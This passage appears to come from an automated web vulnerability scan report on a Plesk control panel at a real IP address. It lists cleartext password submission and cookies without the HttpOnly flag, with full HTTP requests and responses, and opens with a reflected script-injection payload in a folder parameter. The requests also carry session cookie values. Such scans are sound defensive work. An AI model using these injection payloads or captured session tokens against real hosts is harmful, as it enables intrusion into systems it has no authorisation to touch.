searchable: false,
pageable: false,
operationsTag: 'div',
operationsClass: 'objects-toolbar clearfix',
actionsClass: '',
currentFolder: '3a008</script><script>alert(1)</script>bfba8db7d4d',
storageType: 'external',
storageUrl: 'http://plesk.cloudscan.me:80/files/public/',
loadingTitle: 'Please wait. Loading...',
locale: {"noEntriesFound":"No files ye
...[SNIP]...

3. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://174.122.23.218:8880/smb/user/create/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/user/create/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/user/create/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:06:44 GMT
Connection: close
Content-Length: 19843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<div id="main">
<form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post">

<div id='general-vcard' class='form-box' >
...[SNIP]...
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" autocomplete="off" />
<span class='field-errors' style="display:none;">
...[SNIP]...
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...

3.2. http://174.122.23.218:8880/smb/web/create/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/web/create/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/web/create/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:06:54 GMT
Connection: close
Content-Length: 14864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<div id="main">
<form id="form-domain" enctype="application/x-www-form-urlencoded" action="" method="post">


<div id='domainForm-name-form-row' class='form-row' >
...[SNIP]...
<div class='field-value'>

<input type="password" name="hostingForm[password]" id="hostingForm-password" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...
<div class='field-value'>

<input type="password" name="hostingForm[confirmPassword]" id="hostingForm-confirmPassword" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...

3.3. http://174.122.23.218:8880/smb/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /smb/login?returnUrl=%2Fuser%2Flist HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: 174.122.23.218:8880
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:03:01 GMT
Connection: close
Content-Length: 8558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<div id="main">
<form id="form-login" enctype="application/x-www-form-urlencoded" action="login" method="post">

<div id='loginSection' class='form-box' >
...[SNIP]...
<div class='field-value'>

<input type="password" name="loginSection[password]" id="loginSection-password" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...

3.4. http://174.122.23.218:8880/smb/my-profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/my-profile

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/my-profile HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/user/list
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:06 GMT
Connection: close
Content-Length: 25218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<div id="main">

<form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='tab-buttons-form-user' class='tabs'>
...[SNIP]...
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 18 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/hosting/file-manager/ HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:43:34 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=6834c9d95c85ab8050749e0c1fdf8b24; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:43:34 GMT
Connection: close
Content-Length: 965


       <html><head><title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20100707.19"/></script>
       <script language="javascript" typ
...[SNIP]...

4.2. http://174.122.23.218:8880/smb/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /smb/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smb/ HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=9d849cf17c2d47b0f3a3632f74ebeeaf

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /smb/login?returnUrl=%2F
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:13:59 GMT
Connection: close
Content-Length: 0


4.3. http://174.122.23.218:8880/smb/auth/logout  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /smb/auth/logout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smb/auth/logout HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /smb/login
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
Set-Cookie: user=deleted; expires=Sat, 10-Oct-2009 05:01:53 GMT; path=/
Set-Cookie: PHPSESSID=deleted; expires=Sat, 10-Oct-2009 05:01:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:01:54 GMT
Connection: close
Content-Length: 0


4.4. http://174.122.23.218:8880/smb/redirect/pleskin/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /smb/redirect/pleskin/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smb/redirect/pleskin/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: do-not-show-getting-started-popup=true; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; path=/
Set-Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; path=/
Set-Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; path=/
Set-Cookie: locale=en-US; expires=Mon, 10-Oct-2011 02:06:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:06:55 GMT
Connection: close
Content-Length: 0


4.5. http://174.122.23.218:8880/smb/redirect/pleskin/root/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /smb/redirect/pleskin/root/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smb/redirect/pleskin/root/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: do-not-show-getting-started-popup=true; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; path=/
Set-Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; path=/
Set-Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; path=/
Set-Cookie: locale=en-US; expires=Mon, 10-Oct-2011 02:06:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:06:55 GMT
Connection: close
Content-Length: 0


4.6. http://174.122.23.218:8880/smb/redirect/pleskin/root//  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /smb/redirect/pleskin/root//

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smb/redirect/pleskin/root//?dst=%2Fplesk%2Fclient%401%2Fdomain%401%2Fhosting%2Ffile-manager%2F&src=%2Fsmb%2Fweb%2Fview%2Fid%2F1&srcController=WebController HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/smb/web/view/id/1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=false; do-not-show-getting-started-popup=true; show-getting-started-popup=true; user=187d997e8ea6a5d0f56792f7f9ba70a4; PLESKSESSID=9d849cf17c2d47b0f3a3632f74ebeeaf; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /plesk/client@1/domain@1/hosting/file-manager/
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; path=/
Set-Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; path=/
Set-Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; path=/
Set-Cookie: locale=en-US; expires=Mon, 10-Oct-2011 02:16:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:16:33 GMT
Connection: close
Content-Length: 0


4.7. http://174.122.23.218:8880/smb/user/list  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /smb/user/list

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smb/user/list HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: 174.122.23.218:8880

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /smb/login?returnUrl=%2Fuser%2Flist
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:02:57 GMT
Connection: close
Content-Length: 0


4.8. http://174.122.23.218:8880/domains/sitebuilder_edit.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /domains/sitebuilder_edit.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /domains/sitebuilder_edit.php HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:06:56 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:06:56 GMT
Connection: close
Content-Length: 15780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

4.9. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpsdocs%2F HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:16:50 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:16:52 GMT
Connection: close
Content-Length: 37543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

4.10. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-dir/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/create-dir/ HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2F
Cache-Control: max-age=0
Origin: http://174.122.23.218:8880
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycevtoB8pvkCytvMr
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains
Content-Length: 994

------WebKitFormBoundarycevtoB8pvkCytvMr
Content-Disposition: form-data; name="filter"


------WebKitFormBoundarycevtoB8pvkCytvMr
Content-Disposition: form-data; name="page"

0
------WebKitFor
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:19:21 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:19:20 GMT
Connection: close
Content-Length: 22436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

4.11. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-file/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-file/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/create-file/ HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2Fbaseline
Cache-Control: max-age=0
Origin: http://174.122.23.218:8880
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMeEAWKQhARAb0z0B
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains
Content-Length: 995

------WebKitFormBoundaryMeEAWKQhARAb0z0B
Content-Disposition: form-data; name="filter"


------WebKitFormBoundaryMeEAWKQhARAb0z0B
Content-Disposition: form-data; name="page"

0
------WebKitFor
...[SNIP]...

Response

HTTP/1.1 200 OK
